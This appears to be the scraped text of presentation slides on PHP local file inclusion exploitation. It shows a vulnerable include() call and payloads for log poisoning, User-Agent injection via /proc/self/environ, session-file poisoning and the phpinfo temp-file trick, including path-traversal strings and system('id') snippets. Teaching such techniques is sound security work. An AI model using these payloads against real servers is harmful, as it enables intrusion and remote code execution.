  • 16. LFI exploitation Find log file and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
  • 17. LFI exploitation use ProcFS features ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
  • 18. LFI exploitation Use session files ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
  • 19. LFI exploitation phpinfo trick ... include '/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name